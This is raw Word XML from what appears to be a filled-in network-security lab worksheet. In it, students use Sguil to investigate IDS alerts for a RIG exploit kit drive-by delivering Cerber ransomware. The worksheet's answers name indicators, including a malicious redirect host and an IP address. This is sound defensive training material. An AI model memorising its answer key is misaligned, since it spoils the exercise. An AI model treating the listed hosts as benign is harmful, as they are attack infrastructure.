      <w:pPr>
        <w:pStyle w:val="41"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="18"/>
        </w:numPr>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 xml:space="preserve">Click the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="28"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t>Show Packet Data</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="28"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="28"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t>Show Rule</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="28"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t xml:space="preserve"> checkboxes to see the packet header field information and the IDS signature rule related to the alert.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BFCCF8C">
      <w:pPr>
        <w:pStyle w:val="41"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="19"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="36"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="36"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t xml:space="preserve">Select the alert ID 5.2 (Event message </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="36"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t>ET CURRENT Evil Redirector Leading to EK Jul 12 2016</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="36"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t>).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CB317E3">
      <w:pPr>
        <w:pStyle w:val="6"/>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drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251663360" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:posOffset>300355</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>376555</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5425440" cy="3940175"/>
            <wp:effectExtent l="0" t="0" r="3810" b="3175"/>
            <wp:wrapTight wrapText="bothSides">
              <wp:wrapPolygon>
                <wp:start x="0" y="0"/>
                <wp:lineTo x="0" y="21513"/>
                <wp:lineTo x="21539" y="21513"/>
                <wp:lineTo x="21539" y="0"/>
                <wp:lineTo x="0" y="0"/>
              </wp:wrapPolygon>
            </wp:wrapTight>
            <wp:docPr id="3" name="Picture 3" desc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s"/>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25440" cy="3940175"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:anchor>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="613B2F86">
      <w:pPr>
        <w:pStyle w:val="42"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2F93546A">
      <w:pPr>
        <w:pStyle w:val="42"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="00DEEDA4">
      <w:pPr>
        <w:pStyle w:val="42"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1891DA56">
      <w:pPr>
        <w:pStyle w:val="42"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4DA813C4">
      <w:pPr>
        <w:pStyle w:val="42"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="36"/>
          <w:szCs w:val="44"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="36"/>
          <w:szCs w:val="44"/>
        </w:rPr>
        <w:t>According to the IDS signature rule which malware family triggered this alert? You may need to scroll through the alert signature to find this entry.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="440B17CD">
      <w:pPr>
        <w:pStyle w:val="42"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="40"/>
          <w:shd w:val="clear" w:color="auto" w:fill="D4EDDA"/>
        </w:rPr>
        <w:t>Malware_family PseudoDarkLeech</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="789CE5E4">
      <w:pPr>
        <w:pStyle w:val="41"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="40"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="40"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t>e-Maximize the Sguil window and size the Event Message column so that you can see the text of the entire message. Look at the Event Messages for each of the alert IDs related to this attack.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="138FA9AF">
      <w:pPr>
        <w:pStyle w:val="42"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="32"/>
          <w:shd w:val="clear" w:color="auto" w:fill="D4EDDA"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0BE2B122">
      <w:pPr>
        <w:pStyle w:val="6"/>
        <w:ind w:left="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="40"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3CC1073D">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="12B21695">
      <w:pPr>
        <w:pStyle w:val="42"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>According to the Event Messages in Sguil what exploit kit (EK) is involved in this attack:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="277D4592">
      <w:pPr>
        <w:pStyle w:val="42"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="36"/>
          <w:shd w:val="clear" w:color="auto" w:fill="D4EDDA"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7BB03506">
      <w:pPr>
        <w:pStyle w:val="42"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="36"/>
          <w:shd w:val="clear" w:color="auto" w:fill="D4EDDA"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="36"/>
          <w:shd w:val="clear" w:color="auto" w:fill="D4EDDA"/>
        </w:rPr>
        <w:t>RIG EK Exploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C005D5E">
      <w:pPr>
        <w:pStyle w:val="42"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>Beyond labelling the attack as trojan activity, what other information is provided regarding the type and name of the malware involved?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="650AD888">
      <w:pPr>
        <w:pStyle w:val="42"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="36"/>
          <w:shd w:val="clear" w:color="auto" w:fill="D4EDDA"/>
        </w:rPr>
        <w:t>ransomware, Cerber</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C21BD22">
      <w:pPr>
        <w:pStyle w:val="42"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>By your best estimate looking at the alerts so far, what is the basic vector of this attack? How did the attack take place?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6561B87C">
      <w:pPr>
        <w:pStyle w:val="42"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="36"/>
          <w:shd w:val="clear" w:color="auto" w:fill="D4EDDA"/>
        </w:rPr>
        <w:t>The attack seems to have taken place by visiting a malicious web page</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70EF660E">
      <w:pPr>
        <w:pStyle w:val="5"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="18"/>
        </w:num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View Transcripts of Events</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B2B0E57">
      <w:pPr>
        <w:pStyle w:val="41"/>
        <w:keepNext/>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Right-click the associated alert ID 5.2 (Event Message </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="32"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t>ET CURRENT_EVENTS Evil Redirector Leading to EK Jul 12 2016</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="32"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t xml:space="preserve">). Select </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="32"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t>Transcript</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="32"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t xml:space="preserve"> from the menu as shown in the figure.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DD1DEC5">
      <w:pPr>
        <w:pStyle w:val="45"/>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7456" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>center</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>324485</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5486400" cy="2811780"/>
            <wp:effectExtent l="0" t="0" r="0" b="7620"/>
            <wp:wrapTight wrapText="bothSides">
              <wp:wrapPolygon>
                <wp:start x="0" y="0"/>
                <wp:lineTo x="0" y="21512"/>
                <wp:lineTo x="21525" y="21512"/>
                <wp:lineTo x="21525" y="0"/>
                <wp:lineTo x="0" y="0"/>
              </wp:wrapPolygon>
            </wp:wrapTight>
            <wp:docPr id="9" name="Picture 9" descr="screenshot of sguil alert id 5.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of sguil alert id 5.2  highligh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2811780"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:anchor>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="675C0A20">
      <w:pPr>
        <w:pStyle w:val="42"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251666432" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>center</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>289560</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5132705" cy="5745480"/>
            <wp:effectExtent l="0" t="0" r="0" b="7620"/>
            <wp:wrapTight wrapText="bothSides">
              <wp:wrapPolygon>
                <wp:start x="0" y="0"/>
                <wp:lineTo x="0" y="21557"/>
                <wp:lineTo x="21485" y="21557"/>
                <wp:lineTo x="21485" y="0"/>
                <wp:lineTo x="0" y="0"/>
              </wp:wrapPolygon>
            </wp:wrapTight>
            <wp:docPr id="4" name="Picture 4" descr="tr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ravs"/>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132705" cy="5745480"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:anchor>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="50FD504E">
      <w:pPr>
        <w:pStyle w:val="42"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve">the referer and host websites that are involved in the first SRC event? What do you think the user did </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>to generate this alert:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20FEA2A5">
      <w:pPr>
        <w:pStyle w:val="41"/>
        <w:keepNext/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Helvetica" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="D4EDDA"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t>The user issued a search on Bing with the search terms “home improvement remodeling your kitchen.” The user clicked the www.homeimprovement.com link and visited that site</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="28"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t>Right</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="32"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t xml:space="preserve">-click the alert ID 5.24 (source IP address of </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="32"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t>139.59.160.143</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="32"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t xml:space="preserve"> and Event Message </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="28"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t xml:space="preserve">ET CURRENT_EVENTS Evil </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="32"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t>Redirector Leading to EK March 15 2017)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="32"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t xml:space="preserve"> and choose </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="32"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t>Transcript</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="32"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t xml:space="preserve"> to open a </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="32"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251664384" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>center</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>403860</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5486400" cy="1764665"/>
            <wp:effectExtent l="0" t="0" r="0" b="6985"/>
            <wp:wrapTight wrapText="bothSides">
              <wp:wrapPolygon>
                <wp:start x="0" y="0"/>
                <wp:lineTo x="0" y="21452"/>
                <wp:lineTo x="21525" y="21452"/>
                <wp:lineTo x="21525" y="0"/>
                <wp:lineTo x="0" y="0"/>
              </wp:wrapPolygon>
            </wp:wrapTight>
            <wp:docPr id="16" name="Picture 16" descr="screenshot of sguil alert id 5.2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of sguil alert id 5.24 highligh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86400" cy="1764665"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:anchor>
        </w:drawing>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="32"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t>transcript of the conversation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63B25367">
      <w:pPr>
        <w:pStyle w:val="42"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251665408" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>228600</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>2123440</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5659755" cy="4366260"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapTight wrapText="bothSides">
              <wp:wrapPolygon>
                <wp:start x="0" y="0"/>
                <wp:lineTo x="0" y="21487"/>
                <wp:lineTo x="21520" y="21487"/>
                <wp:lineTo x="21520" y="0"/>
                <wp:lineTo x="0"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59755" cy="4366260"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:anchor>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B3690DA">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="075FCD65">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c. Refer to the transcript and answer the following questions:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01575923">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kind of request was involved:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F034519">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HTTP/1.1 GET request</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01F3721C">
      <w:pPr>
        <w:pStyle w:val="18"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:beforeAutospacing="0" w:after="300" w:afterAutospacing="0"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:eastAsia="sans-serif"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0B7E7819">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files requested are:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DD215EA">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dle_js.js</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F9F5E07">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 xml:space="preserve"> </w:t>
      </w:r>
      <w:bookmarkStart w:id="1" w:name="_GoBack"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="sans-serif"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t>the URL for the referer and the host website</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FE71497">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The referer website was www.homeimprovement.com/remodeling-your-kitchen-cabinets.html and the host website was retrotip.visionbura.com.ve.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F0D9F26">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 xml:space="preserve"> the content encoded:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="589F5AC8">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gzip</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="1"/>
    <w:p w14:paraId="746A8CA9">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d. Close the current transcript window. In the Sguil window, right-click the alert ID 5.25 (Event Message </w:t>
